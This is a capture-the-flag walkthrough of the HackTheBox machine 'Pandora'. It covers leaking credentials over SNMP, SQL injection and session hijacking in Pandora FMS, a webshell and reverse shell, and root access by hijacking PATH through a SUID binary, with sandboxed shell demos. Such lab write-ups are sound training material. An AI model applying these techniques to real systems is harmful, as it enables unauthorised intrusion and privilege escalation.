Pandora

Nmap Scan

$ nmap -sC -sV -Pn -oN nmap 10.10.11.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 16:31 +08
Nmap scan report for 10.10.11.136
Host is up (0.040s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds
$ sudo nmap -sU -sV -Pn -oN udp-nmap 10.10.11.136
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.042s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: pandora

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1013.53 seconds

Initial Access

TCP Port 80

Port 80 serves a static landing page.

Nothing on it is obviously interesting: no forms, no obvious parameters, no hints in the source.

Brute-forcing directories and virtual hosts against it returns nothing worth following up either, so port 80 is parked for now.

UDP Port 161

The first step is to recover the community string. Brute-forcing it (nmap's service detection already hinted at it in the scan above) confirms that the read community is public. With that string we can walk the tree and see what the agent leaks.

Walking the tree with braa returns a fair amount of information, including a string that looks like a credential.

However, that string, mississippi, is not the password.

A fuller walk with snmpbulkwalk exposes daniel's password in plaintext. SNMP's HOST-RESOURCES-MIB includes the running-process table together with each process's arguments, so a password passed on a command line is readable by anyone who holds the community string.

That password works for SSH as daniel.
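Added example, not part of the original writeup: a small shell helper that takes a saved snmpbulkwalk of the HOST-RESOURCES-MIB process table, pairs each hrSWRunName entry with its hrSWRunParameters entry by PID, and flags command lines that carry password-style flags. The walk output embedded in it is constructed for the demo; the process name, PIDs and the password string are invented and are not the box's real values. The commands in the comments are the ones you would run against the target; the function itself runs offline on the sample.

```shell
#!/bin/sh
# Added example: mine a saved SNMP walk for credentials passed on a command line.
# Against the target the walk would be produced with, for instance:
#   onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.11.136
#   snmpbulkwalk -v2c -c public 10.10.11.136 1.3.6.1.2.1.25.4.2.1 > hrSWRun.walk
# 1.3.6.1.2.1.25.4.2.1 is hrSWRunEntry: column .2 is hrSWRunName, column .5 is hrSWRunParameters.

# Constructed sample walk output (not real output from the box); the process
# name login_check, the PIDs and the password string are invented for the demo.
SAMPLE_WALK='HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.612 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunName.1109 = STRING: "login_check"
HOST-RESOURCES-MIB::hrSWRunName.1200 = STRING: "apache2"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: ""
HOST-RESOURCES-MIB::hrSWRunParameters.612 = STRING: "-D"
HOST-RESOURCES-MIB::hrSWRunParameters.1109 = STRING: "-u daniel -p ExamplePassw0rd"
HOST-RESOURCES-MIB::hrSWRunParameters.1200 = STRING: "-k start"'

# Read walk output on stdin; print "<pid> <name> <args>" for every process whose
# arguments look like they carry a credential. The -p match is deliberately loose
# (it will also catch port flags); this is a triage filter, not a parser of intent.
find_cred_args() {
    awk '
        /hrSWRun(Name|Parameters)\.[0-9]+ = / {
            split($1, oid, ".")                   # oid[2] is hrSWRunIndex, i.e. the PID
            pid = oid[2]
            val = $0
            sub(/^[^=]*= (STRING: )?/, "", val)   # keep only the value part
            gsub(/"/, "", val)                    # strip the quotes net-snmp prints
            if ($1 ~ /hrSWRunName\./) name[pid] = val
            else args[pid] = val
        }
        END {
            for (pid in args)
                if ((" " args[pid]) ~ / (-p|--pass|--password)[ =]/ ||
                    args[pid] ~ /[Pp]ass(word)?=/)
                    printf "%s %s %s\n", pid, name[pid], args[pid]
        }' | sort -n
}

# Run the filter over the constructed sample; the only hit is PID 1109.
demo_snmp_creds() {
    printf '%s\n' "$SAMPLE_WALK" | find_cred_args
}

demo_snmp_creds
```

On a real walk, feed the saved file in with `find_cred_args < hrSWRun.walk`. The same approach applies to any MIB column that carries free text (sysContact, sysLocation, interface descriptions); the process table is simply the most common place for a credential to surface.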

Getting User

linpeas.sh shows an additional Apache virtual host bound to localhost:80. It is not exposed externally, so we reach it from our machine by forwarding that port through the SSH session as daniel.

SQLi Vulnerability

The internal vhost runs Pandora FMS. The exploit tried first does not return a shell, so we fall back to the SQL injection itself. Running sqlmap against it confirms the injection and reports the database name as pandora.

Enumerating further with sqlmap lists every table in the database; the one that stands out is tsessions_php.

Dumping it shows that the table holds the PHP session data, including live sessions for the admin account.

Setting one of admin's session IDs as our session cookie in the browser logs us into the FMS as admin without knowing a password. The next step is to upload a webshell through the FMS.

From the webshell we trigger a reverse shell with the payload shown in the image below.

This returns a shell as the user matt.

Privilege Escalation

That shell is awkward to work in, so we add our own public key to matt's authorized_keys and log back in over SSH.

Exploiting SUID binary for PATH variable injection

Enumerating files with the SUID bit set turns up pandora_backup. Running it shows that it calls tar, and it does so by bare name rather than by absolute path, so the lookup goes through the caller's PATH.

So we can hijack PATH: put a directory we control first in PATH and drop a malicious script named tar in it.

Make sure the fake tar is executable, otherwise the lookup skips it and falls through to the real tar.

Running pandora_backup again now executes our tar with root privileges, giving a root shell and the flag.
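Added example, not from the original writeup: a sandboxed reproduction of the PATH-hijack mechanism used against pandora_backup. The SUID binary is replaced by a constructed stand-in script that calls tar by bare name, and the planted tar just reports that it ran, so everything executes as the current user with no privilege change. The steps inside hijack_tar are the ones you perform on the target, with the real pandora_backup in place of the stand-in.

```shell
#!/bin/bash
# Added example: reproduce the pandora_backup PATH hijack in a throwaway directory.
# On the target, first find the SUID candidates and confirm tar is called by bare name:
#   find / -perm -4000 -type f 2>/dev/null
#   strings /path/to/pandora_backup | grep -n 'tar'   # look for "tar -cvf ..." with no leading /

# Stand-in for the SUID binary (constructed; not the real pandora_backup).
# It invokes tar without a path, so the shell resolves it through $PATH.
make_fake_suid() {
    local dir=$1
    cat > "$dir/pandora_backup" <<'EOF'
#!/bin/sh
tar -cvf /dev/null /etc/hostname   # resolved via PATH, not /bin/tar
EOF
    chmod +x "$dir/pandora_backup"
}

# Plant a tar in a directory we control, put that directory first in PATH, and
# run the target binary. Prints whatever the hijacked tar prints.
# On the real target the payload is a shell that keeps the elevated euid, i.e.
# "/bin/bash -p"; plain bash drops euid back to the real uid on startup.
hijack_tar() {
    local dir=$1
    mkdir -p "$dir/bin"
    cat > "$dir/bin/tar" <<'EOF'
#!/bin/sh
echo hijacked
EOF
    chmod +x "$dir/bin/tar"        # without +x the lookup skips it and finds the real tar
    PATH="$dir/bin:$PATH" "$dir/pandora_backup"
}

# Full run in a temp directory; returns the single line the planted tar prints.
demo_path_hijack() {
    local work
    work=$(mktemp -d)
    make_fake_suid "$work"
    hijack_tar "$work" | head -n 1
    rm -rf "$work"
}

demo_path_hijack
```

Two things decide whether this works on the real binary: tar must be referenced without an absolute path (confirmed above with strings or by watching it run), and the binary must not reset PATH before calling it. When it does work, remember that the planted script runs with euid 0 but uid matt, so the payload has to be something that keeps the effective uid (bash -p, or copying bash and setting the SUID bit on it) rather than a plain interactive shell.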
